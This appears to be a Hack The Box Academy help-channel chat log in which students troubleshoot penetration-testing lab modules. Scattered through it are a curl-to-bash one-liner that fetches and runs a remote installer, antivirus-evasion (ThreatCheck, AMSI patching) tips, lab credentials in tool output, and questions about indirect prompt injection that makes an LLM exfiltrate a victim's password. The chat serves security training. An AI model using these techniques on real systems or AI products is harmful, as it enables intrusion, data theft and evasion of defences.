However, none of the inputs resulted in execution behavior, time delays, error messages, or any output differences. The application consistently enforces input constraints (such as minimum character length) and behaves like an internal file search rather than a system command execution.

Based on this behavior, it appears that this functionality does not invoke OS commands and therefore is not vulnerable to command injection.

Could someone please confirm if the goal of this challenge is to identify the absence of command injection rather than exploit one, or point me in the right direction if I am missing another execution vector?

Thanks in advance for your time and help.

ok. So in the ongoing saga of the WEP ARP Request replay attack, I was able to get a new result after I let the airodump produce more results in the WEP-01.cap file. When I run aircrack -3 now, it runs the script without a segmentation fault. However, it's still failing to find the key... so I guess I'll try again and let the airodump go even longer?

You can send me a DM so I can see what you have going on.

Hello, I have a suggestion about something I saw in the Linux BufferOverflow Module:

Is giving us the command to set the Intel syntax as default, which is nice, but nowadays is not better to recommend to use ⁨⁨⁨⁨⁨⁨⁨GEF⁩⁩⁩⁩⁩⁩⁩ Instead?

Also the suggested command:
⁨⁨⁨⁨⁨⁨⁨⁨```sh
echo 'set disassembly-flavor intel' > ~/.gdbinit

Will over write your configuration file,  deleting  the lines ⁨⁨⁨⁨⁨⁨⁨`GEF`⁩⁩⁩⁩⁩⁩⁩ "installed" in case you had ⁨⁨⁨⁨⁨⁨⁨`GEF`⁩⁩⁩⁩⁩⁩⁩. 
⁨⁨⁨⁨⁨⁨⁨`GEF`⁩⁩⁩⁩⁩⁩⁩ comes with Intel syntax already by default.

Wouldn't being more useful to point to ⁨⁨⁨⁨⁨⁨⁨`GEF`⁩⁩⁩⁩⁩⁩⁩ directly, which is the enhanced version of ⁨⁨⁨⁨⁨⁨⁨`GDB`⁩⁩⁩⁩⁩⁩⁩ for modern days?
⁨⁨⁨⁨⁨⁨⁨⁨```sh
bash -c "$(curl -fsSL https://gef.blah.cat/sh)"
```⁩⁩⁩⁩⁩⁩⁩⁩

im doing attacking common application module and i cant use droopescan. can anyone help

'attacking common applications -> attacking thick-clients' is there anyway to save the newly created .jar file to my machine to 'save' my work?

or is that not allowed?

I created a fork of GEF, a modified version of hugsy/gef. I've added various features, such as kernel-related features, qemu-user integration, debugging from outside Docker, more allocator dumper, and so on. Please try it out if you like.

https://github.com/bata24/gef

no module named ⁨imp⁩
When python presents the error ⁨no module named⁩; it means that you don't have that library installed, usually tools come with a ⁨requirements.txt⁩ you use to pull the requirements to load it properly

Cool stuff bro, I will try it for sure!

It gives me an error when I try to install the req

well if it gives errors installing the requirements, then the tool won't run

also, isn't it meant to be run with python2.7? at least the one they link to?

file transferring

Okay I’ll download 2.7

do it in a virtual environment; https://docs.python.org/3/library/venv.html

sorry not venv, virtualenv https://virtualenv.pypa.io/en/latest/

https://www.python.org/downloads/release/python-2716/ this is the downloads page for 2.7.16 the highest version available pre-EOL

I’m confused and idk what that is tbh 😅

But I’ll just download 2.7 and see what’s gonna happen

Guys can somebody help me? Doing xss skill assessment, and got this...
everything did correctly, step by step...
(I will answer later, cause have to go to sleep rn. TYSM in advance 🙂 )

Hey, I doing windows evasion module in that static analysis, dynamic, etc we need to compile the c# code in release mode and x64 architecture but when use the threatcheck tool to scan the threats shows no threats found in the exe but if we do the same for the .dll file it shows the threats.

while googling got a method to publish the program into a single file as app.exe and then ran the same threatcheck tool on the app.exe now it shows the threats present in the exe. i have question over here to solve the challenges we need to first compile it into a single exe then bypass all the threats to get the flag?

just want to ensure that my understanding is correct or not? because in the material nothing like this is mentioned

Its working do try it and keep this in mind

⁨`Main part is compilation, when we compile the program it should be Release build -> architecture (x86,x64) . After successful build the file stored in .exe .dll .pdg etc but the payload stays in the .dll file so if we are using Threatcheck tool to check use it on the .dll file.

Another way is storing the executable in a single file for this we need to follow few steps.

Build the program -> Solution explorer -> Right click -> Publish -> Target (Folder) -> Specific Target (Folder) -> Publish location -> Configuration (Release & architecture) -> Deployment mode (Self-contained) -> Target Runtime (win-x64) -> File publish options (Produce single file)

now the project executable stores as .exe and .pdg and if we use the ThreatCheck tool on the exe it will shows whether it has bad bytes or No threat.`⁩

Using a virtual environment lessons the risk of fucking things up

I've an issue in "Server-Side JavaScript Injection", whenever I want to put the flag it shows me that it is incorrect.

Can anyone help me with 'Credential Hunting in Network Shares' in Password Attacks? I'm a little bit stuck

i get error: externally-managed-environment

Read the whole message and it tells you what to do

still with --break-system-packages i cant run the tool

Look for patterns, q1 asks for a domain user, q2 requires the credentials to find an administrator

Well if you installed python2.7 then you'll need to use the command python2.7 droopescan

Sounds like you're missing a requirement then :)

when I try to install the requirements i get an error

python2.7 -m install packagename

"No module named install"

Sorry mistyped

Its -m pip install

Then replace packagename with what you're installing

python2.7 -m pip install packagename?

ok

no pip module it says

?

python2.7 -m pip install -r requirements.txt

yeah same

Otherwise it thinks you're trying to install a package literally named requirements.txt

Ah ok

That's a different error than im thinking

so

Google is your friend

Learn how to look up and resolve errors

alr thx

All I've been doing is googling what you're giving me

@karmic frigate module is above tier 0, please refrain from sharing screenshots from it

Ok but its not something big i just shared a screenshot of a picture of burp from the module to compare expected output and the problem

Its still considered content from the module

yo guys

im on the module 'Attacking Applications Connecting to Services'
im trying to set a breakpoint to reveal the SQL connection credentials

but im getting ```Cannot insert breakpoint 1.
Cannot access memory at address 0x11b0

which is the function call for the connection, and the credentials' address must be stored at some register at this stage, if im not mistaken

im doing this module Server-side Attacks / Exploiting SSRF
so it supposed to give me a dashboard with the admin password but still giving me the answer for Identifying ssrf in past section
because both have the same directory but different outputs for each section
i have reset the target machine multiple times and still the same so no idea why

Hi, I have a quick Q in regards to DACL Attacks II > SPN Jacking - I've been able to capture the last flag, but not via WinRM - is WinRM the intended method / should you be able to grab the flag this way?

in gdb?

try breaking at the function name

if not, break at the address using *0x11b0 in your case

whats the question

Is anyone able to clarify what I may be doing wrong on the "Bypassing Security Filters" for the "Web Attacks" module? ....nevermind sorted it out and am humbled..

Hi, im doing the Password Attacks module, on the pass the ticket (linux) section. Ive made it all the way to the root user but cannot get to reading julio.txt. Ive found the second krb5||cc_64...HRJDux file||, exported it, and then ran ||smbclient //dc01//julio -k -c ls --no-pass|| Still no luck. Any hints for moving forward?

this is a compleeeeeeeete longshot but any chance you remember wht you did to fix it? i am getting the same error

Suggest running klist after you've exported it to ensure it is still valid.

Thank you for the help! That, interestingly was the answer. One of the the tickets did not refresh until i moved it to a different users directory. Appreciate it

What's the content of the flag located at C:\Users\Arturo\Desktop\flag.txt windows lateral movement skill assessment

any nudge ? , (ps: i have access as arturo tho)

Make sure you're on the right machine

same protocol ?

cuz i found a lot of non standerized ports tho on that same machine

i got access using one of them

but the desktop is empty

is it me or this module with the binary and web thick client exploit buggy as hell?
https://academy.hackthebox.com/module/113/section/2164

i was working on this yesterday and the new.jar file worked but now today when creating the new.jar file doesnt even want to open up

Yo

ive changed the beans.xml and manifest.mf files while removing the hash files (RSA and SF)
but not sure if i am doing something wrong although following the instructions got me somewhere yesterday

can i dm about the skill assessment question ?

yeah

hello, can i get any help with the skill assessment of the api attacks module? i just have a few questions

OK, I'm very confused (and possibly very frustrated). I'm working on "Exploiting Web Vulnerabilities in Thick-Client Applications". I'm at the point where I'm modifying the binary to download another binary. I've modified the code as per the walk-through and now I have to generate new class files.... My question is "why?" Why am I not just creating an entirely new binary like I did before and go from there?

I generate class files, I over write the old one with the new ones, rebuild again... why am I going through all that work?

what module?

Sorry, 'Attacking Common Applications'

Good evening everyone, currently in my Junior Cybersecurity analyst path and am doing the skills assessment under Network Foundation - Chapter 3 - I keep receiving an “inverse host lookup failed” when I input the following command nc -v <Target IP > <dynamic port> which the last two numbers when I enter passive mode is 194 & 16 - am I entering something wrong here? Any insight would be helpful

@soft moon you still around?

this is a very common friction point for that section. It feels rushed and slapped on with little thought

Really glad you said it and not me.

i don't recall when it was added, but it very much was a big wtf moment from practically everyone

and you're seeing the improved version of that section

I'm sorry, my brain was not prepared for that last part.

No joke, it's causing problems with my learning disability.

It's very frustrating.

I'll muscle through it but it's... tough.

most people weren't prepared for it because you're basically reverse engineering a java application with very little rhyme or reason as to the back and forth

Really glad I'm not the only one. That makes me feel a lot better.

and Java Sucks™

OH MY GOD RIGHT?!

why?! why are we still doing this to ourselves?!

because it's on 6 billion machines /s

https://tenor.com/view/的9-gif-12565004940729182637

oh...

that's so many...

(it's a joke, have you seen the java splash screen?)

thankfully not in YEARS

https://i.sstatic.net/Jteqd.png

Why?

I was doing so good.

Because you have been given the curse of Ra for decompiling and recompiling Java (against your will)

Ok, you joke, but I'm about 🤏 this close to believing you.

https://tenor.com/view/mummy-amulet-benny-gif-3572668208863830428

i am now had to sit down and think

between this section and the binary my progress has crawled painful desk head banging

Cool if I DM you?

sure go for it

i now got the new.jar file to work but now it doesnt want to connect

the next day curse is true

https://giphy.com/gifs/customer-service-help-desk-call-center-3rgXBBaVvhPXk3NSnK

Did you solved it yet?

its at this address in which im getting the error

For Attacking WPA/WPA2 Wi-Fi Networks
Page 13
Attacking EAP-TLS Authentication:

• I cannot find the file nagaw.py in remote machine.

it's in the /opt directory

thank bro

Hi, I learned about module password attacks. I have troubleshot I do not understand the methodology to create a wordlist for cracking. Can someone refer me to some docs or websites to learn some methodology for this ?

i rise

still in need of help here

hello!

not quite sure what command you are running in the debugger but this error might be due to you trying to break on the PLT address instead of the function name.

You can send me a DM if you still need help

Do we have asrep roast in attacking AD module?

yes

Currently working on XPath - Blind Exploitation script building. The author mentions "Note: Writing a small script for this task is recommended." I do not get where the "small" part is, I am already at 100 lines of code in python and I still need to add more. Am I missing something?

anyone having issues with Connect to the HTB-Corp WiFi network using the obtained credentials. What is the value of the flag at 192.168.1.1?

Section 11: Enterprise Evil-Twin Attack

I already gotten the first 2 question correct but could not authenticate to the WiFi ... even with wpa_supplicant

You can DM how your trying to do this. I'll be at my PC shortly.

send the error you are getting, like the output of gdb

can't seeem to find the answer for this one can someone tell me what is the correct answer i have tried everything

it's this module

Check DM

Hi! on OWE Transition Mode Evil Twin https://academy.hackthebox.com/module/304/section/3872
I did the exact commands shown in here (and even in the solution provided by gold annual, which are exactly the very same commands) but I only get EAPOL frames, but no POST requests, even when I restart the box, can someone guide me to it ?

Did anyone ever get back to you on this? I'm haviing the same issue. I've tried on VPN, I've tried on pwnbox. I keep getting the Issue sending URL. I've tested the payload and it catches the credentials. I've tried to paste the URL directly into the address bar to try an bypass the form in the send page too incase that was an issue as well.

To be clear I've tried resetting the pwn box and triying VPN over again checking the payload, checking my php file in the temp server. I've even rage quit a couple of times and come back hours later and even the next day to see if this was an issue with any of the servers maybe, and at this point I don't know what else I could be missing.

Thank you for your time and help with this!

Good evening, I'm working on Introduction to Linux Forensics and I'm stuck with 1 question. I have found all possible answers but none of them are working. Can anybody help me? It would be better to find someone who has already done that.

Hey guys , I am new here need some help with Login Brute Forcing skill assessment 2 , i was able to find the username for ftp but stuck in the password can someone help

For how long are you leaving tcpdump to capture the traffic, or you are not terminating the process at all?

10+ minutes

I just tested the exercise and letting it capture the traffic for 2-4 minutes I was able to see the HTTP traffic inside wireshark

On which VPN server are you doing the exercise?

EU Academy 5

I found the answer but that was kinda absurb

no problem on any other exercices, just this one

Let me test the exercise on eu-5

In the meantime if you would like to test it in parallel you can try on us-academy-4, on which it worked.

sure, let me try

@autumn pilot yes it worked (slowly because US is far from my location) on US-4

yeah, that's the downside of it

from what I can see on the EU region it might be due to the overload at the moment

damn, a lot of issues with the EU vpns lately ...

thanks for the support

no worries

yeah

hope we get a middle east server in the future

AD Trust Atks Using Bloodhound-CE

For some reason enum from user in parent domain -> child domain, bloodhound-ce-breaks. I have my /etc/hosts and krb5.conf. I did both with and without extra dot. Yes WS01 is the DC (great naming...). I assume I'm doing something wrong but rusthound-ce did this no problem

rusthound-ce -u htb-student@inlanefreight.ad -p 'HTB_@cademy_stdnt!' -i 172.16.118.20  -f WS01.child.inlanefreight.ad  --domain child.inlanefreight.ad  -c All --zip

┌──(p1erce㉿ATKBOX)-[~/CAPE/Trust-Attacks]
└─$ bloodhound-ce-python -u htb-student@inlanefreight.ad  -p 'HTB_@cademy_stdnt!' -d child.inlanefreight.ad. -ns 172.16.118.20 --zip -c All --dns-tcp  -dc WS01.child.inlanefreight.ad  -v
INFO: BloodHound.py for BloodHound Community Edition
DEBUG: Authentication: username/password
DEBUG: Resolved collection methods: rdp, session, acl, trusts, group, container, objectprops, psremote, localadmin, dcom
DEBUG: Using DNS to retrieve domain information
DEBUG: Querying domain controller information from DNS
DEBUG: Using domain hint: child.inlanefreight.ad.
INFO: Found AD domain: child.inlanefreight.ad
DEBUG: Found primary DC: WS01.child.inlanefreight.ad
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
DEBUG: Found KDC for enumeration domain: WS01.child.inlanefreight.ad
DEBUG: Found KDC for user: DC01.inlanefreight.ad
DEBUG: Using supplied domain controller as KDC
INFO: Getting TGT for user
DEBUG: Trying to connect to KDC at DC01.inlanefreight.ad:88
DEBUG: Following referral across trust to get next TGT
DEBUG: Trying to connect to KDC at CHILD.INLANEFREIGHT.AD:88
DEBUG: Following referral across trust to get next TGT
DEBUG: Trying to connect to KDC at CHILD.INLANEFREIGHT.AD:88
DEBUG: Following referral across trust to get next TGT
DEBUG: Trying to connect to KDC at CHILD.INLANEFREIGHT.AD:88

AD Trust Atks Using Bloodhound-CE (Workaround)

I checked what rusthound was doing, turns out forcing ntlm made this work, so I think it's something weird with DNS + Kerberos (as usual). Of course this won't work in labs where NTLM is disabled, but a temp-fix for now.

┌──(p1erce㉿ATKBOX)-[~/CAPE/Trust-Attacks]
└─$ bloodhound-ce-python -u htb-student@inlanefreight.ad  -p 'HTB_@cademy_stdnt!' -d logistics.ad. -ns 172.16.118.252    --auth-method ntlm --zip -c All --dns-tcp
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: logistics.ad
INFO: Connecting to LDAP server: DC02.logistics.ad
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 3 computers
INFO: Connecting to LDAP server: DC02.logistics.ad
INFO: Connecting to GC LDAP server: DC02.logistics.ad

I’m on the windows evasion module, specifically on AMSI bypasses.

I have defender flag the second bypass on behaviour on my own windows box, kicking up a fuss for the fact I am patching AMSI. Is this just a thing now, patching AMSI bad?

Is anyone available to provide a hint on imagebot in the LLM Output Attack Skill Assessment in the AI Red Teamer Path? I'm to the point where I'm performing an injection against a vulnerable function in imagebot. Tried a lot of different things so far but no luck.

Can anyone help with the LLM Output Attacks > Exfiltration Attacks 2 question, where my indirect prompt injection is failing to prompt LLM output with the victim's history. Even though I’ve successfully hosted the payload, the methodology only returns generic assistant text instead of exfiltrating the actual password from the victim.

Hi! I'm currently working through the "Attacking Common Applications" module from the CPTS path and got kinda confused in the "Attacking CGI Applications - Shellshock" section. How comes that we inject the payload into the User Agent string? This came a little random for me. Also I didn't really understand when the payload is executed. In the subsection "Shellshock via CGI" it says "The function does nothing but returns an exit code 0, but when it is imported, it will execute the command ...". When or where is the function imported?

@cloud urchin can i dm about the windows lateral movement skill assessment ?

it's about the wsus abuse using ||rossy||

Its imported via the User Agent, its exploiting a sanitization flaw that allows for arbitrary code execution

is it normal to get an error like this !!! ? 👀

btw am using powershell with domain joined user tho

I understood that part - my question was more what happens with the user agent on the server side? If I’m not mistaken, its value must be used as an environment variable to be able to abuse the Shellshock vulnerability. What would this typically be used for under normal circumstances?

UserAgents are just whom is sending the request; browsers have theirs, curl uses its own by default

Its just a flaw in how the user-agent was being processed. You're not likely to run into Shellshock in a modern system

Yes that’s correct but does not really answer my question 😅 the question is how exactly is it processed to trigger the vulnerability

It's not sanitized properly, meaning that you can manipulate it to send arbitrary commands

In a web application, for instance, it might check for ../ in a regex, and replace it, but only does it once

Or replace things in uploaded files

I.e. a. Php file you upload may have the <,> characters replaced

Or insert a # at the start of the line

any1 available to give me a hand exfiltrating a file in the PDF injection lab of Injection Attacks?

Hey guys, what's up?
Someone can help me in Password Attack module? i'm currently in "pass the certificate", trying get the Administrator acessar by "AD CS NTLM Relay Attack (ESC8)"

Well, i tried what the htb say about that, but the printerbug returns error to me
check it out

┌──(kali㉿kali)-[~/HTB/krbrelayx]
└─$ python3 printerbug.py INLANEFREIGHT.LOCAL/wwhite:"package5shores_topher1"@10.129.234.174 10.10.14.124
INFO: Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

INFO: Attempting to trigger authentication via rprn RPC at 10.129.234.174
INFO: Bind OK
INFO: Got handle
The NETBIOS connection with the remote host timed out.
INFO: Triggered RPC backconnect, this may or may not have worked
CRITICAL: An unhandled exception has occured. Trying next host:
CRITICAL: Error occurs while reading from remote(104)

well.. after that, i tried scan using Certipy and found that HTTP is not enable in the machine

──(Certipy)─(kali㉿kali)-[~/HTB/Certipy]
└─$ cat 20260203173356_Certipy.txt
Certificate Authorities
  0
    CA Name                             : inlanefreight-CA01-CA
    DNS Name                            : CA01.inlanefreight.local
    Certificate Subject                 : CN=inlanefreight-CA01-CA, DC=inlanefreight, DC=local
    Certificate Serial Number           : 75ADD4AAC656AE874ABB2F4016102CF1
    Certificate Validity Start          : 2025-04-28 17:01:06+00:00
    Certificate Validity End            : 2035-04-28 17:11:05+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Unknown
    Request Disposition                 : Unknown
    Enforce Encryption for Requests     : Unknown
    Active Policy                       : Unknown
    Disabled Extensions                 : Unknown
Certificate Templates                   : [!] Could not find any certificate templates
                                                                                      

so... what i do wrong?

this is suppose to be not vulnerable by ESC8, right?

anyone here for the skill assessment of (windows lateral movement)

wsus is not wsusing anymore xD

Hello all -- I am just cleaning up some missed cubes and went back to the 'Getting Started' module to do the 'public exploits' section. I was able to enumerate, find the exploit, find a public exploit to throw at it and successfully got the flag but during this I was also trying to figure out developing and understanding the exploit for myself. I understand that there is a vulnerable module which downloads the target file but I am lost on how to actually find the filepath in the first place. The exploit I found just iterated through ../, ../../, etc. until it found the file but that only works if the file is somewhere in the modules current folder hierarchy. Additionally, what would have been my command line alternative to trigger the file download of the vulnerable module; the exploit used a python requests.get but when I put in the same URL in a curl request I get nothing back (although maybe I am not iterating enough parent folders?). Any advice appreciated. I am trying my best to never use MSF

Trust Account Kerberos vs NTLM?
Can any anyone explain why I need a TGT for the trust account for this?

┌──(p1erce㉿ATKBOX)-[~/HTB/CAPE/Trust-Attacks]
└─$ pcq impacket-getTGT 'megacorp.ad/logistics$' -hashes :<SNIP>
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in logistics$.ccache

┌──(p1erce㉿ATKBOX)-[~/HTB/CAPE/Trust-Attacks]
└─$ pcq nxc smb megacorp.ad -u 'logistics$' -H <SNIP>
SMB         224.0.0.1       445    DC03             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC03) (domain:MEGACORP.AD) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         224.0.0.1       445    DC03             [-] MEGACORP.AD\logistics$:<SNIP> STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT

┌──(p1erce㉿ATKBOX)-[~/HTB/CAPE/Trust-Attacks]
└─$ pcq nxc smb megacorp.ad -u 'logistics$' --use-kcache
SMB         megacorp.ad     445    DC03             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC03) (domain:MEGACORP.AD) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         megacorp.ad     445    DC03             [+] MEGACORP.AD\logistics$ from ccache

Hello, I'm having trouble with the SQL Injection Fundamentals Skills Assessment part. I've tried looking up some tutorials of it, but they seem to be outdated as they are not using the same login page to exploit. If anyone can point me in the right direction I would appreciate it.

You can dm me if you still have trouble with that

Follow the module on gettgtpkinit if you already capture the certificate. after u get the ticket and cannot dump hash with impacket dump like the module showcase which is what happen to me, then try with netexec

Trust accounts cant auth with ntlm or do interactive logins

has anyone had problems in the bloodhound module - analyzing bloodhound data where in community edition it shows 0 sessions?

No its fine . It was right infront of me

Any help with the API Attacks skill assessment? Can i DM someone?

Me

long shot type of question,but has anyone around here used HTB Academy to prepare for CREST certifications?

Hi guys. I'm trying to do the web archive excercise on the information gathering module but It's not working. I keep clicking on the specified date but it shows me another, is this part of the exercise or is it just my internet?

module Information security foundation sub module Winfows security and the section is windows security (got the same name ) question is Find the SID of the bob.smith user. and my anwer is  S-1-5-21-2614195641-1726409526-3792725429-1003

now i have tried removing those "--" did not worked i remove the S

did not worked

I only can get the certificate of jpinkman, by shadow credentials.
with ESC8, there's no way to get the certificate :/
i cannot get the administrator certificate by shadow credentials bc there's no permission to do that

Actually, i cannot hit the web page in my browser btw

Which module and section are you working on?

.

I can't find a module called Information Security Foundation

That is the name of the path

name of the module

A path is a collection of modules

sorry it is a path my bad

hello, please in File Inclusion - Remote File Inclusion (RFI) (/module/23/section/254)
the target spawn without a port and I am unable to reach it.

You need to download your VPN profile and use it to connect to the VPN so you can reach the target

Also, try using curl or nmap to verify if the web application is running (on port 80 presumably)

So I did this in /etc/hosts : 10.129.27.170 app.inlanefreight.local
10.129.27.170 dev.inlanefreight.local
using curl with this curl -I http://app.inlanefreight.local
curl: (7) Failed to connect to app.inlanefreight.local port 80 after 3219 ms: Could not connect to server
curl -I http://dev.inlanefreight.local
curl: (7) Failed to connect to dev.inlanefreight.local port 80 after 3251 ms: Could not connect to server
wafw00f http://app.inlanefreight.local got this back: RROR:wafw00f:Something went wrong HTTPConnectionPool(host='app.inlanefreight.local', port=80): Max retries exceeded with url: / (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7f8cd5d80590>: Failed to establish a new connection: [Errno 113] No route to host'))
ERROR:wafw00f:Site app.inlanefreight.local appears to be down
then this: wafw00f http://dev.inlanefreight.local got this: ERROR:wafw00f:Something went wrong HTTPConnectionPool(host='dev.inlanefreight.local', port=80): Max retries exceeded with url: / (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7ff39fcd0590>: Failed to establish a new connection: [Errno 113] No route to host'))
ERROR:wafw00f:Site dev.inlanefreight.local appears to be down

went to this: nikto -h http://app.inlanefreight.local

• Nikto v2.5.0

• 0 host(s) tested
  Same came out for dev. What did I do wrong. I followed the steps, but it still didn't work. Can some one please point this old dog to the kibble bowl of 'why'?

Hello! Is it possible that there is an issue with target spawning in https://academy.hackthebox.com/module/35/section/223 ?
I want to do the exercice to complet the section but the target dose not spawn.
Any help?

Hello, I have also been having trouble spawing targets for the past 20 minutes on several modules.

Ah i see! Thanks.
Good to know that its not on my side.

well, I do have VPN, I already completed bunch of modules and previous sections in this module

you can see the tun0 on my screenshot

ok, I downloaded new VPN file and now it works ok!

me too

Think this was an issue last week

seems to be happening again

The windows priv esc module is only for stand alone machine or priv esc in AD as well?

Do we know whether internal HTB team are working on the current issue?

Standalone. Privesc in AD is more covered in Active Directory Enumeration & Attacks

Hey everyone,
I was doing pivoting rpivot sub module, it was easy to get to the needed browser but i cant see any flag on homepage and tried to move to other pages to look for it but cant find it. The one on the homepage doesnt work, it just says || It works! || but istg it doesnt.

are you visiting the internal machines webpage?

yes

for me its ip is || 172.16.5.129 || i checked it running ip a

Sounds correct. The flag should be in the red box where it normally says "It works!"

its saying just that

but there is no flag

can you send me the commands you used so far in dms?

its still unresolved

Hi everyone,
I was doing the Skill Assessment for the module "INTRO TO ASSEMBLY LANGUAGE", For the first task. I am able to decode the shellcode and trying to run it using jmp rsp instruction but running into segmentation fault.

I have tried to clear the register rax,rbx,rcx. But the error still remained.

btw if u need help with cwes dm me :)

Hi, I am running through the XSS module, I am currently on the phishing task. I have managed to get it to call back to my php server when I post into index.php. but when I go to put the URL into send it wont take it? any help appreciated (I get the issue sending URL error)

You can DM what you are trying.

Did you get this sorted out?

Stuck on File Upload skill assesment:
Try to exploit the upload form to read the flag found at the root directory "/".
I found the upload dir via ||XXE injection||
and found the allowed content type and extentions
but still coulndnt upload a backdoor

I have an issue in a module: https://academy.hackthebox.com/module/296/section/3402
What is the exact OS Version that WinPEAS delivers?
10.0.17763

what is the actual ans, it's always telling me wrong

Are you sure you need a backdoor for that SA? o_O

you can dm me if still need help. Will guide you

Hello. This is the exact command from the module. But it does not work ....

Hi! I'm trying to pass the skill assessment task in the AI Privacy Module. The instancehits an immediate timeout right after submitting the model. Is it related to Docker issues or anything else? I’d appreciate any help, can't do anything with it the whole day

Hi, I’m having issues with the Windows Privilege Escalation – Windows Server module. The RDP connection using rdesktop keeps dropping, and smb_delivery constantly crashes the Meterpreter sessions. Is anyone else experiencing this or has found a solution?

Did you try what the command suggested, specifying the domain?

is there a problem with the machines?

Yes

Should be slowly working again for everyone tho

https://status.hackthebox.com/

but what happened?

I remember I did a machine yesterday

they asked me the password of ftp so I was brute forcing

maybe I done something wrong

Hello, I'm having trouble with the SQL Injection Fundamentals Skills Assessment part. I've tried looking up some tutorials of it, but they seem to be outdated as they are not using the same login page to exploit. If anyone can point me in the right direction I would appreciate it.

you can DM me

Hi I’m in the AD enumeration and attacks module and the chapter “Initial enumeration@ asks us to xfreerdp to the Linux attack box they’ve set up. I’m not able to connect to that box. See screenshots.

Hi

you should clean your laptop first

maybe you should shut your mouth and not care about it.
This community is about helping each other with hacking, not about making "fun" of others / hating them...

sometime you have just little bit wait for setup of target system / restart it...

Or:
ip a and look if you see "tun0"

and try ping 10.129.26.51

Thanks. I think I'm good for now. Turns out the other commands in that section don't require gui access, so its enough if I ssh into the box.

oh you are right

sorry grany

@fathom pendant I see HTB is having docker target issues? I'm able to spin up a lab but can't ping it. However i get filtered ports on a nmap scan? Are these issues related?

not staff, don't know

Well you should be.. 😉 thanks anyways

i feel that it is me..

like

i was brute forcing something yesterday

i don't know if i did something wrong

sorry

hey guys, I"m trying to work through Kernel Exploits in the Windows Privilege Escalation module. I get down to the section where I'm supposed to replace the maintenanceservice.exe binary with a malicious binary, but it won't copy because access is denied. I cannot open cmd in admin mode.

it appears to be an inability to access the destination folder, because I can copy the file to Desktop, but it won't go from Desktop to the destination

I also cannot do it with the powershell Copy-Item

ok. So I guess my issue there was that I used ⁨.\⁩ to run the CVE exe. Now I've gotten past that, but now I"m trying to get the meterpreter session and it's not working...

looking at the msfvenom command I used to generate the exe, it's the correct payload, ip, port... same IP and port that the metasploit is expecting to get.

can I get a nudge on Advanced XSS and CSRF Exploitation - XSS Filter Bypasses
I'm past the filter but my payload errors out with CORS error.
got it. not a fan of a module that teaches you something but not that it might silently fail or how it's different than the other payloads in a pretty major way

CDSA : Guys who know about Windows Event Logs & Finding EVIL path Analyzing Evil With Sysmon & Event Logs module's labs , I did well like content but in eventvwr.exe there are not any id 7 ? What I must do in this case , after all labs action not appearing 7 id 🙁

Ive the same issue since ever

U need to switch vpn for us, because they usually have the least load

If it dosent work either, i try after some hours and it works

Hey, Can anyone help me with the rundll32 from windows evasion module bit stuck followed the entire procedure in the module but not getting the reverse shell?

Request: Help on an HTB academy objective assessment.

So essentially I’ve gone through the “network foundations” module and am on the O.A for it at the end. I’ve taken a significant amount of notes on it however, I have no experience using the parrot OS or any OS for that matter. I’m having a hard time understanding the information put in front of me in the OS window. Are there any resources that break down in detail how to read the data in this table and what’s actually important?

I can’t attach images but essentially my issue is that idk what I’m looking at in the parrot terminal it all seems like randomized data. Yes I can identify IP’s but that’s where my knowledge of the information ends. Any advice/resources would be greatly appreciated.

Module: Introduction to Windows Evasion Techniques
Section: Process Injection
Question: Write a program that spawns calc.exe and then uses PE injection to grant a reverse shell. Place it in "C:\Alpha\ProcessInjection" and wait up to a minute until a user runs the program. Your goal is to read the contents of flag.txt on the desktop of the user who will execute your program.

I followed everything and literally copy-pasted the code (using micr0_shell payload as stated) and it keeps giving me the thread timeout error in log.txt file.
It says checking for calc.exe..... then thread timeout or something like that.
Tried to even write my own version in C++, also did not work.
Can anyone please help?

Still the same issue, nothing changed. Can anybody help with it and try to submit any model to the target server? Will it be OK?

Still need help? DM me

DM me

Module: Using CrackMapExec
Section: Searching for Accounts in Group Policy Objects
Question: What's the name of the other account present in the GPO?

Executing the -M gpp-password module has been showing timeout for two days now.
Can anyone please help?

Try adding the --dns-timeout 30 and --dns-tcp flags

any help?

Take a look at the PowerShell bit version used in the code and based on that use the specific dll

After many attempts, it still times out. Is there an issue with the environment?

With a little adjustment of the timeouts it ran successfully

Hey guys, i would need some help for the DNS section in the Footprinting module, it's for the last question : What is the FQDN of the host where the last octet ends with "x.x.x.203"? but i don't find any host in 203 and as far as i tried, reverse dns didn't worked..
Does someone can help me ?

subdomains of subdomains

Use the diagram in the section to build an idea of what you need to enumerate next

In Command Injection - Identify Filters question Try all other injection operators to see if any of them is not blacklisted. Which of (new-line, &, |) is not blacklisted by the web application? I'm pretty sure my answer is correct but it keeps saying incorrect answer. The answer is in the question itself new-line, &, |

even using the actual OPERATOR name

I have to brute force each subdomain to find it ???

is not the correct answer

Finally effective, thank you very, very much

well you can skip the one you already enumerated for the other questions. But yes, it won't take that long to actually enumerate

I believe the answer to the question is wrong... or the question is wrong

only one is accepted as the answer, it's a known thing. (check #1234357888114364508 )

With this : for sub in $(cat /opt/useful/seclists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.inlanefreight.htb @10.129.14.128 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done ? Cause there is a lot of subdomains so if i have to test 110000 for each .. it will be long

the subdomain isn't in the top1million list that you're looking for as sub2.sub1.inlanefreight.htb

yeah yeah, i've already the sub1, but if i have to search any sub2 on all the sub1 it will be long

step 1: dig axfr inlanefreight.htb @ip
step 2: use that as your base list for checking

yeah yeah it's what i'm doing

using one of the tools listed, only one other subdomain will yield results (as in it takes time for it to process)

module is above tier 0; please don't share command output

ok mb

hmmmmm

also as a general strategy for finding the right wordlist: start small go big

i'm using the 32bit vesion

